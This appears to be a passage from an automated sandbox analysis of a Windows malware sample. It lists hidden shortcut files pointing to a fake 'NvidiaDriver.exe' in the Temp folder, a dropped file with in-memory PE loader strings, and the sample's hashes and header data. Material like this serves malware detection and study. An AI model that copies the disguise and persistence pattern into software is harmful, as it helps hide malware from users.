                                                                                                                                          SHA-512:452B22E045D96E781A42CF08F5AF26BC66A5E2B3922D7BD10E38B6A0D54A7DD35CE4107C1A93997D819CC73572F69DB54DBB4A0AE9180D3055F910994E966176
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I..'S...I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I.......I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.....................zY..T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...............................N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:56 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.937762259748706
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HfOBetq43HR6JgKA5PK2TXAqmfmOKm3EjkqyFm:8/OBetVRVf0qa0PjtyF
                                                                                                                                          MD5:A6E3FAF971364B8D307C487C22D9D12B
                                                                                                                                          SHA1:947659D1337F05D8A7547CFB9D083036493F3CF3
                                                                                                                                          SHA-256:E5A2124945B3D2E21616C7CBA44A4247776AE9082506A313E67334612CCE984C
                                                                                                                                          SHA-512:0B44B4B8BC8BDBAFEC9DB6DB4D2C09DBE7F2CF9FDB6F71D78B6E2A4055EDE24A322E64CAB033B541BB77A0299DFAEF607B4223B3232E421C8D28A212F7F7A28D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I..?..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:52 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.936606574792113
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HccVBetq43HR6JgKA5PK2TXAqmfmOKm3EjkqyFm:88QBetVRVf0qa0PjtyF
                                                                                                                                          MD5:58219A92680913B28DE2EB7E443F40D4
                                                                                                                                          SHA1:BFB7D8348D1824FE38FAC3696F6094B4DB6FACF5
                                                                                                                                          SHA-256:9C180785BACF09A566B82197051187691CCB0D461B1C413DD5C4962CDCA27DCF
                                                                                                                                          SHA-512:83E56E9FE4DD72E06886935B45FAC6264A42BAFF0DF699786072BB96DE11DD45209B97C013E7133784F49D9269B2CEE8875A5224D61D1A47B80654B179B64798
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I......I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:49 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.934512147640464
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HZBetq43HR6JgKA5PK2TXAqmfmOKm3EjkqyFm:85BetVRVf0qa0PjtyF
                                                                                                                                          MD5:49D9C3C1ECAE7B0959B64AB13E4999BE
                                                                                                                                          SHA1:52190C437D894B9FB441CDF0408279EA7700259A
                                                                                                                                          SHA-256:45FCD506C6DC7F9B07F8DC5FFDB20C21619AB74F0908C74B4F3ACBC32A0FFEE8
                                                                                                                                          SHA-512:AAAB68D1079F04FA0196929349B88F04A0AB0EA7BD96D1A41F483425CF6AD53D614244005CE37922AA0BFE02CC1F2ED45F622C28AA30EFE2A8518324D2BC409C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I......I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:48 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.935057999333844
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HnpBetq43HR6JgKA5PK2TXAqmfmOKm3EjkqyFm:8JBetVRVf0qa0PjtyF
                                                                                                                                          MD5:DD1EAC32EDFEFFFD4A49EFAEAC3FDA8E
                                                                                                                                          SHA1:F3CD7E132805A58A14E6BE06151F118221AA05E3
                                                                                                                                          SHA-256:6D5987B189530537550983A26FE591C9228C58BF62A99630EA71A61804231AFB
                                                                                                                                          SHA-512:A54CFE80E4111478622561181CFA09457F0707C7E1F6824BF7491C4EFEDC619B22E52FE134766CF19DADF5B2A37869F2DF991916114E99306D28DD9B3D03C4B2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I....,..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:43 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.940391481536779
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8H+Betq43HR6JgKAGsK2TXAqmfmOKm3EjkqyFm:8eBetVRbf0qa0PjtyF
                                                                                                                                          MD5:18B9321CB34B724D544A8130A63E50BF
                                                                                                                                          SHA1:4F218F57E500B80AB6A10BAEE0C6C29F911ABE88
                                                                                                                                          SHA-256:389F8BCAD5BA112D3BA1104A5BCA8EB5C12C0D5D5386D42011134F62FD4D6441
                                                                                                                                          SHA-512:3B6B74E59E504AA06B28315F17E8F9D94F1ABFDA993BE855E7C69594A4782E677C4EA337744FCE02EF7F69816319385BA270C95E79416816524FED2DD6CD0ECB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I...<...I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:45 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.937943368510917
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nsBetq43HR6JgKAGsK2TXAqmfmOKlNmN3EjkqyFm:8sBetVRbf0qa0lECjtyF
                                                                                                                                          MD5:19CE6B2DD0F89EB5C93C423FA1829AF0
                                                                                                                                          SHA1:5BF52395A06F194817DCDE6B5ECA7FD362D29766
                                                                                                                                          SHA-256:8A1F7B214235F0AB6DD6F60B66CFBF0042C4885883072C1CB868185F6F4B680F
                                                                                                                                          SHA-512:C0D7E57C75EC83DF9EBEFC8238140DB5B1393CD1E72900D53540FD142DD9E0C94E7AFF5FA2F57F9CCEB2702C8818690D0C79F5D3D25053969BA1E2A5E95647F9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I......I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:54 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.930848332744325
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8n2XOBetq43HR6JgKA5PK2TXAqmfmOKlNmN3EjkqyFm:82XOBetVRVf0qa0lECjtyF
                                                                                                                                          MD5:D09D0334FAFB2688A305F99619C6784D
                                                                                                                                          SHA1:293998B20CD977B812DBF69BE2C36F873012F8F8
                                                                                                                                          SHA-256:6F21384580A6BE0D2F2FC851076F0547E971978F847933B438FBF70483DEA7CA
                                                                                                                                          SHA-512:DC1CBA27DFB5F33833A440ACF9A3953155D67ECCD935E372F20989227AEDC51D82EDAC25DDD014EBA7C4BDD2D92C7107AAF712A64EC282DA0FF2068CF3BAC280
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I...,...I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:47 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.935898848810036
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nTBetq43HR6JgKAGsK2TXAqmfmOKlNmN3EjkqyFm:8TBetVRbf0qa0lECjtyF
                                                                                                                                          MD5:999507487ABA5623464AA4C4B9BC0DA9
                                                                                                                                          SHA1:42B5FB85F8CD00995B66E5BC83414EA0B735346D
                                                                                                                                          SHA-256:4574D21F2B9838165690F0E9964C1DE4C5CE0FE93ED2B63725684F6D80ACD42D
                                                                                                                                          SHA-512:E638C37A6FCB2DEB031D96CB5B20B1CB06B065A00540690418698E6B53C1184E0BCCA795F1AB2A76F616A4357AC7A2B9272272FEF2FFE4E996DFC1319FAE56BD
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I..X.w..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:46 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.931820311690698
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HeBetq43HR6JgKAGsK2TXAqmfmOKm3EjkqyFm:8+BetVRbf0qa0PjtyF
                                                                                                                                          MD5:F532C4761C18A0DA608E56DEE7677BA3
                                                                                                                                          SHA1:2BFA7866EE004FE99678456B0621EFF35F8491FB
                                                                                                                                          SHA-256:6F90FA2CFB411D11E9F3C973359B1D6788B17545150DE042645DCBFAF121D4A9
                                                                                                                                          SHA-512:B843B861CD13B483B8AA3B7387CDD8B4F6E336AE0745D4388B11522317956A88F38A07DB2AC4517A10D55555006645890431A85312E41D501744644C6B767B91
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I...U..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:49 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.9332741278530134
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nqVBetq43HR6JgKA5PK2TXAqmfmOKlNmN3EjkqyFm:8qVBetVRVf0qa0lECjtyF
                                                                                                                                          MD5:C8BD302FF4FCCF386B0FA929FE68B8A2
                                                                                                                                          SHA1:17B1B41853EDAF7AD9060139A7AE65FC7E9D1CDB
                                                                                                                                          SHA-256:21031EC67FDC9F456E28818DDCDCBE00E0A4DC8EEE40B40519E7CCAADF2C5A70
                                                                                                                                          SHA-512:3BEBA54126F3D261ACBBC3BDDDBA6FBF5CA24F2C25F8C71527C84BAFD13660732E3D378DBE2898FD4775F7BFB911746416EF3DB6539966E9316305658ED94AEC
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I..W>..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):284
                                                                                                                                          Entropy (8bit):3.4136171436422327
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:3PJGXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0l9t0:Wf2RKQ1CGAFAjzvYRQV9t0
                                                                                                                                          MD5:1BEA51EE713829CF09AFDE612589F668
                                                                                                                                          SHA1:F0BAD55C7EA3779A395162CD16854A104C4E5917
                                                                                                                                          SHA-256:6857367883DE180E38539C9A43761752CA6E0C477E0A3B5FB5E4F9083D869783
                                                                                                                                          SHA-512:E0B2BFB40D0E70A7FA16B3966AC4220EF00BC553666C56317097FF14FEF747DD8642B050C067C95973DD2BAA79D6907FDDE5AFE408E82DAE3D40AE18EA652EB2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.........D.M.f.zWKX7F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):643
                                                                                                                                          Entropy (8bit):5.791324649098374
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:NyjZ7S1/srSLxMd3Vso2eXfc+rHJK9CJmTyaHT0/Y+adNdnBuzMqYfn:NyF7s/sWKdlsxeZk4IT/0/Zwpf
                                                                                                                                          MD5:7B7CDE31791403E2D2BD6C2B125F677D
                                                                                                                                          SHA1:5F8F28E2BDFACCB51AE803697BE5670C625B0CFA
                                                                                                                                          SHA-256:7DCF2EB90BC52E2C2BEDFA99EA52A1B0AB27DC9E5EAF7A7B60FA087CEB738627
                                                                                                                                          SHA-512:152AC37D13F62FAFCAE99F87930DFC84AB951B20DEB3D8FC12E145A0FDECCF373FBAF393F9E2AC7371763C857399BADC16C53C51A95C042D8C12DDE90BDB65E9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:Main:..291328..@S.U^w{4..6683..=Z#xIf]>@)~9%..466..M`]rS#r60<pj_u1/n$>y..6958..D>l{..16121..A7@bgA:2]..10783..R+:EVfxpAOg?Tew..21169..fpRVp+g.mC$_!..2425..3%$S=cY?]..10607..CSRj1"J~l|\XofaH..11499..b]~xPqLA#-iF..18153..9:d}\~(&"Ql]2XGgh..6552..&L1s5oL*m6K@z^Aj0pt..23467..2Pv4wYu4_V.L..24433..o$_unEBqat..15244..lilBTC>#~l?..15267.._6KE1W'T9-..5952..U"%zkE,.VJw..2181..<cs4@FXq@XYA..10766..REsources are loaded..Data got successfully..dosHeader..ntHeaders..AllocateMemoryForPE..imageSize..alignment..filemapping..!filemapping..imageBase..if imageBase..delta..CopyPESections..PerformRelocation..LoadImports..entryPoint..entryFunc..entryFunc()..
                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):6.655721818767042
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:file.exe
                                                                                                                                          File size:3'296'768 bytes
                                                                                                                                          MD5:41f7104e635f418ec5a33d817b5324d9
                                                                                                                                          SHA1:7c9a3124d4bf236a560c6a865b0034f79a65f875
                                                                                                                                          SHA256:3301f21b0e9b43873293f712c6a8eccb7746c09207e0cedcfe836d060862c6f8
                                                                                                                                          SHA512:7dfd8e767be1b7904ff44b90cbc973a577f831db0dc81c44167838146a8912efe3631510fcf37451396206613419ca6d0fa0554a74af1764d50c056a3b66338e
                                                                                                                                          SSDEEP:49152:kVF+M26kfUw7yoxeBqOo7NjGOTIkets5JsE8p7OuEFWH:e4M26kfUwGoxeBqV7BVtZheKuEU
                                                                                                                                          TLSH:81E54A92B60AB1CBD4DE1BB98027CD8B991D43B5471148C7EC6CB479FD63EC212A6E34
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                                          Entrypoint:0x725000
                                                                                                                                          Entrypoint Section:.taggant
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:6
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:6
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:6
                                                                                                                                          Subsystem Version Minor:0
